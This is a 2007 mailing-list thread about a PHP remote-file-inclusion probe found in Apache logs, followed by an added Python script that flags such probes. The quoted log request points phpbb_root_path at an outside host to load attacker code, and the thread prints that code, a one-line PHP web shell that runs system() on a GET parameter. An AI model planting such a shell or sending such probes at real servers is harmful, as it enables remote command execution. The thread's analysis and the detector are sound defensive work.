On Wednesday 25 April 2007 14:48, Marcus Meissner wrote:
On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
Hello,
I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
Errors below (profanity not mine);
69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Looks like some kind of PHP include attack scanner, against lots of PHP apps.
It looks like an indirect injection exploit--getting the hacker's code to run in the environment of the server to which it is sent. Is PHP really so trusting as to load and execute remote code in the manner suggested by this attack? Similar things are possible with database applications when the author naively uses string concatenation to combine template query fragments with user-supplied parameters.
M.txt contains: <? system($_GET['cmd']); die ("Morfeus hacked you"); ?>
Looks like: a) Morfeus doesn't spell very well. b) Morfeus knows only Windows. c) Morfeus is kind of rude.
ciao, Marcus
Randall Schulz
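Log triage for the kind of probe quoted in this thread, as an added example that is not part of any poster's message: it parses Apache combined-format lines and flags requests that pass a remote URL as a query parameter value, which is the pattern in the logged request. The sample lines are constructed with documentation-range addresses, and the function and field names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# A parameter whose value is itself a remote URL is the mark of an include probe.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation-range addresses, made-up agent string).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php'
    '?phpbb_root_path=http://192.0.2.10/~user/M.txt?&/ HTTP/1.1" 404 1046 "-" "ExampleScanner"',
    '198.51.100.7 - - [02/Apr/2007:09:34:11 -0700] "GET /index.php'
    '?page=http%3A%2F%2F192.0.2.10%2FM.txt%3F HTTP/1.1" 200 512 "-" "ExampleScanner"',
    '203.0.113.5 - - [02/Apr/2007:09:35:00 -0700] "GET /search.php?q=apache+http+docs'
    ' HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def find_rfi_probes(lines):
    """Return one finding per request that passes a remote URL as a parameter value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        hits = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
                if REMOTE_URL_RE.match(v)]
        if hits:
            findings.append({
                "client": m["host"], "path": path, "params": hits,
                "status": int(m["status"]), "agent": m["agent"],
                # 2xx: the script exists and answered, so review it first;
                # 404, as in the thread, means the probed script is absent
                "served": m["status"].startswith("2"),
            })
    return findings


if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG):
        print(f["client"], f["status"], f["path"], f["params"], "REVIEW" if f["served"] else "")
```

Applications that legitimately take a URL as a parameter (redirect or proxy endpoints) will also match, so treat findings as candidates for review rather than confirmed attacks.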